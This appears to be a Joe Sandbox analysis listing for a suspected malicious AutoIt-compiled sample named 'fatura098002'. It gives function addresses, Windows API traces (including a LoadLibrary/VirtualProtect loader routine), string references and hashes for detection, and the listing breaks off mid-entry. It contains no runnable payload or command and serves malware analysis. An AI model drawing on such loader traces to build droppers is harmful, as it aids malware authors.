Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
String ID:
API String ID: 388478766-0
Opcode ID: d1097382fd8ae05e619b139c4805b44439670a50107e0e6c1657000037e3f154
Instruction ID: 3de5b6d4c5d0d6a194d319e3ea2d74eee41c36e1060d5d10468091a0ee5ea82e
Opcode Fuzzy Hash: d1097382fd8ae05e619b139c4805b44439670a50107e0e6c1657000037e3f154
Instruction Fuzzy Hash: BF42DF70604341EFD739CF64C848BAAB7E1BF86311F54861AE855872D2D7BCAC49CB92

Function 0070344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78

Part of subcall function 00703357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00703379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0070356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0074318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007431CE
RegCloseKey.ADVAPI32(?), ref: 00743210
_wcslen.LIBCMT ref: 00743277
_wcslen.LIBCMT ref: 00743286

Strings

Include, xrefs: 00743184, 007431C5
Software\AutoIt v3\AutoIt, xrefs: 00703560
>v, xrefs: 007034E8
\Include\, xrefs: 00703527
\, xrefs: 0074328C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: >v$Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-1205141652
Opcode ID: c007ab069f71b10cac586e3fe9cc9c6a7f2110b83da54a19c279ebcef905d919
Instruction ID: 9da94b0131ce0503e3500214857364d531172c3f5f02bb83b9c3cbb5f4386c8d
Opcode Fuzzy Hash: c007ab069f71b10cac586e3fe9cc9c6a7f2110b83da54a19c279ebcef905d919
Instruction Fuzzy Hash: 31718D71505301EEC704EF29EC8585BBBF8BF94340F40852EF545831A2EB7C9A4ACB65

Function 0074065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0074039A: CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7

GetLastError.KERNEL32 ref: 0074076F
__dosmaperr.LIBCMT ref: 00740776
GetFileType.KERNELBASE(00000000), ref: 00740782
GetLastError.KERNEL32 ref: 0074078C
__dosmaperr.LIBCMT ref: 00740795
CloseHandle.KERNEL32(00000000), ref: 007407B5
CloseHandle.KERNEL32(?), ref: 007408FF
GetLastError.KERNEL32 ref: 00740931
__dosmaperr.LIBCMT ref: 00740938

Strings

H, xrefs: 007408BD

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
Instruction ID: 0af0ad0515d27515a00041bfc374052d2c8895a88b266e2067257e2f11f99890
Opcode Fuzzy Hash: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
Instruction Fuzzy Hash: B9A12632A04118CFDF19AF78D855BAE7BB0EB06320F24415EF9159B292D7399D12CBD2

Function 00702B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00702B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00702B9D
LoadIconW.USER32(00000063), ref: 00702BB3
LoadIconW.USER32(000000A4), ref: 00702BC5
LoadIconW.USER32(000000A2), ref: 00702BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00702BEF
RegisterClassExW.USER32(?), ref: 00702C40

Part of subcall function 00702CD4: GetSysColorBrush.USER32(0000000F), ref: 00702D07
Part of subcall function 00702CD4: RegisterClassExW.USER32(00000030), ref: 00702D31
Part of subcall function 00702CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00702D42
Part of subcall function 00702CD4: LoadIconW.USER32(000000A9), ref: 00702D85

Strings

AutoIt v3, xrefs: 00702C2F
0, xrefs: 00702C0F
#, xrefs: 00702C16

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
Instruction ID: 413df99bf573e4344f6ec95b8858ec5d5fcde52eceb32d0ba899cdbec52bbf17
Opcode Fuzzy Hash: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
Instruction Fuzzy Hash: 22214C70E02318BBDB119FE5EC59A9D7FB4FB08B50F80812BE500A66A0D3B90540CF98

Function 0070B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0070BB4E

Strings

p#}, xrefs: 0070BA72
p%}, xrefs: 0070BB32
p#}, xrefs: 0075024F
x#}, xrefs: 00750168
p#}, xrefs: 00750263
x#}, xrefs: 00750207
p%}, xrefs: 0070B8DC
p#}, xrefs: 0070BB6B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#}$p#}$p#}$p#}$p%}$p%}$x#}$x#}
API String ID: 1385522511-210118448
Opcode ID: 6413959cc653f5f3ce4714276167200b52ecec64b81e2b349de0394ab87d7771
Instruction ID: ec605d7e78951ede8b2736d1e6128005d5eb667a293a9917f8ed8b26e22ae3ba
Opcode Fuzzy Hash: 6413959cc653f5f3ce4714276167200b52ecec64b81e2b349de0394ab87d7771
Instruction Fuzzy Hash: 7932B074A00209DFDB24DF54C894ABEB7F5EF44310F14815AED05AB2A1D7BCAE86CB91

Function 0070DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%}, xrefs: 0070E1E0
D%}, xrefs: 0070E4B1
D%}, xrefs: 00752FDA
D%}, xrefs: 0075302D
D%}D%}, xrefs: 0070E27E
Variable must be of type 'Object'., xrefs: 007532B7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: D%}$D%}$D%}$D%}$D%}D%}$Variable must be of type 'Object'.
API String ID: 0-1073507847
Opcode ID: a1b0d9c9ed3f1d03fe9ff3960b47088b75ed7d4f05b8d3790b43c30fa51c43c8
Instruction ID: 673b823800580dc104de188e1d811510c6b7c24781d3604155f892d059a87102
Opcode Fuzzy Hash: a1b0d9c9ed3f1d03fe9ff3960b47088b75ed7d4f05b8d3790b43c30fa51c43c8
Instruction Fuzzy Hash: 6BC27F71A00215CFCB14CF58D884AADB7F1BF19310F248A69E955AB3E1D379ED82CB91

Function 00702CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00702D07
RegisterClassExW.USER32(00000030), ref: 00702D31
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00702D42
LoadIconW.USER32(000000A9), ref: 00702D85

Strings

+, xrefs: 00702CF0
TaskbarCreated, xrefs: 00702D37
AutoIt v3 GUI, xrefs: 00702D23
0, xrefs: 00702CE9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
Instruction ID: 3e489d1f44f4e0a987e121135d6726ebd408b8109a05e72c3601300cf7c1daa0
Opcode Fuzzy Hash: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
Instruction Fuzzy Hash: 1721E3B1902248AFDF01DFA4EC59BDDBBB8FB08700F40811BF511A62A0D7B95541CFA8

Function 00FCFBE8 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00FCFC2D

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 88be1a46c05e7556e3f51042181773d97c038ba4b6dd6dff18013b0b22974eaa
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: E8511C75A50209FBEF20DFE0CD49FDEB779AF48710F108518F61AEB180DA749A449B60

Function 00702C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00702C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00702CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CCF

Strings

AutoIt v3, xrefs: 00702C89, 00702C8E, 00702C8F
edit, xrefs: 00702CAC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
Instruction ID: 2589e3d7d6f0aa35f43ced9b8d33811eef524faaac327a9c776e8b769a732f72
Opcode Fuzzy Hash: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
Instruction Fuzzy Hash: CDF0DA756412907BEB311717BC08E772FBDD7C6F60B80805BF904A25A0C6691851DAB8

Function 007010F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00701BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22

Part of subcall function 00701B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00701BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0070136A
OleInitialize.OLE32 ref: 00701388
CloseHandle.KERNEL32(00000000,00000000), ref: 007424AB

Strings

>v, xrefs: 007011C8, 0070129C
dMv, xrefs: 00701105

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: >v$dMv
API String ID: 3094916012-2248944516
Opcode ID: cdad650d29e668aaf0194571a936b94a82837b00da47d25b1aa982954788217f
Instruction ID: a4e066809f6b0f41a633379466635b1f3c958a167351c2291cfeeb3a73f7df93
Opcode Fuzzy Hash: cdad650d29e668aaf0194571a936b94a82837b00da47d25b1aa982954788217f
Instruction Fuzzy Hash: D371A9B4A02240EEC784DFB9B9496553BF0AB883643C4C26BD00BC73A2EB3C5461CF59

Function 00838720 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0083885A
GetProcAddress.KERNEL32(?,00831FF9), ref: 00838878
ExitProcess.KERNEL32(?,00831FF9), ref: 00838889
VirtualProtect.KERNELBASE(00700000,00001000,00000004,?,00000000), ref: 008388D7
VirtualProtect.KERNELBASE(00700000,00001000), ref: 008388EC

Memory Dump Source

Source File: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 9028a85d14c84083535aed9488cd66c07275744f1a9d3da601c01e898c288cce
Instruction ID: 59595aad2438e0399d4545c0d90cf824475d890ddec7fc25dc56885ee28626c3
Opcode Fuzzy Hash: 9028a85d14c84083535aed9488cd66c07275744f1a9d3da601c01e898c288cce
Instruction Fuzzy Hash: 1A510372A55356CBD7209AB88C80660B7A2FB91364F780738F5E1C73C5EFA4590A87E0

Function 00FD16B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD15A8: Sleep.KERNELBASE(000001F4), ref: 00FD15B9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FD17DB

Strings

YY0II93CMPVE96CDZEQ1H, xrefs: 00FD185B, 00FD185E

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: CreateFileSleep
String ID: YY0II93CMPVE96CDZEQ1H
API String ID: 2694422964-3983011577
Opcode ID: 12c82c669ca870fcffd8d355a65c7a0edd0d0847c0aff25d0114cda37f672b6f
Instruction ID: 9210fcaeb6cfdd2a72ab2865fa7782c109c3cf8b21c33e424e73e545304fd84b
Opcode Fuzzy Hash: 12c82c669ca870fcffd8d355a65c7a0edd0d0847c0aff25d0114cda37f672b6f
Instruction Fuzzy Hash: FB51C071D04249EBEF11DBE4C915BEFBBB9AF14300F04419AE6087B2C1D6B90B04DBA5

Function 00703B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B83

Strings

Control Panel\Mouse, xrefs: 00703B3E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
Instruction ID: bd9dff7c2bcf0b86668e3cb6827feba11fdabb2f0dbce50b971c60cc354ce93b
Opcode Fuzzy Hash: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
Instruction Fuzzy Hash: 58112AB5510208FFDB21CFA9DC85AAEBBFCEF04748B10855AA805D7150E2359E459764

Function 00703923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007433A2

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00703A04

Strings

Line: , xrefs: 007433EB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 25057949fdff8e497b55f998bed918a37d15315277a63d4fcddc203116918eb0
Instruction ID: ed3a7753648e31e1b5f3614aa6c91926f8366e2cc8fa40504e1b6c4778d65c39
Opcode Fuzzy Hash: 25057949fdff8e497b55f998bed918a37d15315277a63d4fcddc203116918eb0
Instruction Fuzzy Hash: 9431C171509300EAC725EB24DC49BEBB7ECAF40714F408A2BF599821D1DB7CAA49C7C6

Function 0071FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00720668

Part of subcall function 007232A4: RaiseException.KERNEL32(?,?,?,0072068A,?,007D1444,?,?,?,?,?,?,0072068A,00701129,007C8738,00701129), ref: 00723304

__CxxThrowException@8.LIBVCRUNTIME ref: 00720685

Strings

Unknown exception, xrefs: 00720692

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
